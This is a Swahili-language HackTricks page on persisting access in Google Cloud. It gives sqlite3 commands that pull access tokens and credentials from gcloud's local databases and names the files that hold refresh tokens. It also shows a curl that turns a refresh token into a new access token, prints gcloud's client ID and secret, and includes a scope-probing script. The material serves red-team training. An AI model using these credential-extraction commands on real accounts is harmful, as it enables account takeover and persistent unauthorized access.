GCP - Token Persistence

Reading time: 6 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Authenticated User Tokens

Ili kupata token ya sasa ya mtumiaji unaweza kukimbia:

bash
sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"

Angalia katika ukurasa huu jinsi ya kutumia moja kwa moja tokeni hii kwa kutumia gcloud:

Cloud SSRF - HackTricks

Ili kupata maelezo ya kuunda tokeni mpya ya ufikiaji endesha:

bash
sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"

Ni pia inawezekana kupata refresh tokens katika $HOME/.config/gcloud/application_default_credentials.json na katika $HOME/.config/gcloud/legacy_credentials/*/adc.json.

Ili kupata access token mpya iliyosasishwa kwa kutumia refresh token, client ID, na client secret endesha:

bash
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token

Uhalali wa refresh tokens unaweza kudhibitiwa katika Admin > Security > Google Cloud session control, na kwa default umewekwa kwa masaa 16 ingawa unaweza kuwekwa kutokufa milele:

Auth flow

Mchakato wa uthibitishaji unapokuwa ukitumia kitu kama gcloud auth login utafungua dirisha katika kivinjari na baada ya kukubali maeneo yote kivinjari kitatumia ombi kama hili kwa bandari ya http iliyofunguliwa na chombo:

/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1

Kisha, gcloud itatumia hali na msimbo pamoja na client_id (32555940559.apps.googleusercontent.com) na client_secret (ZmssLNjJy2998hD4CTg2ejr2) kupata data ya mwisho ya refresh token.

caution

Kumbuka kwamba mawasiliano na localhost yako katika HTTP, hivyo inawezekana kukamata data ili kupata refresh token, hata hivyo data hii ni halali mara 1 tu, hivyo hii itakuwa haina maana, ni rahisi tu kusoma refresh token kutoka kwenye faili.

OAuth Scopes

Unaweza kupata scopes zote za Google katika https://developers.google.com/identity/protocols/oauth2/scopes au kupata hizo kwa kutekeleza:

bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u

Inawezekana kuona ni mipaka gani programu ambayo gcloud inatumia kuidhinisha inaweza kusaidia kwa kutumia skripti hii:

bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope         \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
done

Baada ya kuitekeleza, ilikaguliwa kwamba programu hii inasaidia maeneo haya:

https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email

ni ya kuvutia kuona jinsi programu hii inavyounga mkono drive scope, ambayo inaweza kumruhusu mtumiaji kupandisha kutoka GCP hadi Workspace ikiwa mshambuliaji atafanikiwa kumlazimisha mtumiaji kuunda tokeni yenye scope hii.

Angalia jinsi ya kudhulumu hii hapa.

Akaunti za Huduma

Kama ilivyo kwa watumiaji walioidhinishwa, ikiwa utafanikiwa kudhulumu faili ya ufunguo wa faragha ya akaunti ya huduma utaweza kuipata kawaida kwa muda wote unavyotaka.
Hata hivyo, ikiwa utaiba tokeni ya OAuth ya akaunti ya huduma hii inaweza kuwa ya kuvutia zaidi, kwa sababu, hata kama kwa kawaida tokeni hizi zinatumika kwa saa moja tu, ikiwa mhasiriwa atafuta ufunguo wa faragha wa api, tokeni ya OAuh itabaki kuwa halali hadi itakapokwisha.

Metadata

Kwa wazi, kadri unavyokuwa ndani ya mashine inayofanya kazi katika mazingira ya GCP utaweza kupata akaunti ya huduma iliyoambatanishwa na mashine hiyo kwa kuwasiliana na mwisho wa metadata (zingatia kwamba tokeni za Oauth unazoweza kupata katika mwisho huu kwa kawaida zinapunguziliwa mbali na scopes).

Marekebisho

Marekebisho kadhaa kwa mbinu hizi yanaelezwa katika https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2

Marejeleo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks